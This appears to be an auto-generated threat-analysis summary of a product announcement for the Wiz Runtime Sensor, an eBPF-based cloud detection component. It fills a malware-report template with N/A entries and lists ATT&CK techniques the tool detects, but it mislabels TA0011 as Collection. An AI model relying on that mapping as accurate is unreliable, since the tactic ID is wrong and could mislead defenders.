Full Report
Today we are excited to announce the Wiz Runtime Sensor. The sensor collects signals in real-time from the workload runtime to simplify threat detection and response in the cloud as part of our Cloud Detection and Response (CDR) capabilities.
Analysis Summary
# Tool/Technique: Wiz Runtime Sensor
## Overview
The Wiz Runtime Sensor is a lightweight, eBPF-based component designed to collect workload runtime signals (network use, processes, memory use) specifically for cloud-native environments, integrating these signals with the broader context provided by the Wiz Security Graph for enhanced Cloud Detection and Response (CDR).
## Technical Details
- Type: Tool/Component (Part of the Wiz Cloud Security Platform)
- Platform: Cloud workloads (VMs, Containers, Serverless, PaaS environments)
- Capabilities: Collects real-time runtime signals, integrates with existing agentless posture data, designed for ephemeral workloads.
- First Seen: Not explicitly stated, but launched within the CDR module context.
## MITRE ATT&CK Mapping
*Note: Since this is a detection/response tool, its purpose is to *detect* techniques, not execute them. The mappings below reflect techniques it is designed to detect based on the signals it gathers.*
- [TA0011 - Collection]
- [T1005 - Data from Local System] (Detection via process/memory analysis)
- [TA0007 - Discovery]
- [T1016 - System Network Configuration Discovery] (Detection via network use signals)
- [TA0003 - Persistence]
- [T1543 - Create or Modify System Process] (Detection via process creation monitoring)
## Functionality
### Core Capabilities
- Collects true runtime signals (network usage, processes, memory utilization) via eBPF.
- Remains lightweight by relying primarily on agentless scanning for posture and vulnerability data.
- Designed specifically for cloud-native, short-lived workloads (e.g., containers).
### Advanced Features
- **Breaking Silos:** Integrates workload signals with cloud/Kubernetes events and the Wiz Security Graph context to trace attacker movement across cloud layers.
- **Contextual Prioritization:** Enables high-fidelity prioritization of threats, such as correlating a suspicious process on a privileged machine with access to sensitive data buckets.
- **Ephemeral Workload Association:** Accurately associates runtime detections with specific, short-lived cloud resources (e.g., Kubernetes Deployments).
- **Extensibility:** Can consume signals from existing EDR and runtime solutions.
## Indicators of Compromise
Detection relies on correlating the runtime signals collected by the sensor with existing cloud context.
- File Hashes: N/A (The sensor is a deployment component, not malware)
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: Signals gathered may include outbound connections indicative of C2 or exfiltration. (Defanged examples are context-dependent, e.g., `suspicious.example[.]com`)
- Behavioral Indicators:
- Suspicious process execution on cloud workloads.
- Unusual network activity originating from containers or ephemeral functions.
- Memory access patterns indicative of compromise.
## Associated Threat Actors
Associated with security and development teams seeking to improve posture and implement CDR within cloud environments (Defensive/Blue Team context).
## Detection Methods
Detection is achieved through the Wiz CDR analysis layer that consumes the sensor data within the Wiz Security Graph context.
- Signature-based detection: Not the primary focus; relies on contextual anomaly detection.
- Behavioral detection: High-fidelity detection based on correlating runtime behavior (process, network) with known cloud asset inventory and configuration risks.
- YARA rules: Not explicitly mentioned.
## Mitigation Strategies
The tool itself is a mitigation/response layer built upon successful posture management.
- Prevention measures: Maintain strong cloud posture management (Wiz's agentless scanning).
- Hardening recommendations: Use the CDR capabilities to quickly identify and isolate compromised, ephemeral workloads where traditional EDR solutions fail.
## Related Tools/Techniques
- Wiz Security Graph (Provides context).
- Agentless Cloud Security Posture Management (CSPM) scanning (Provides baseline context).
- Existing EDR/Runtime solutions (Signals can be integrated).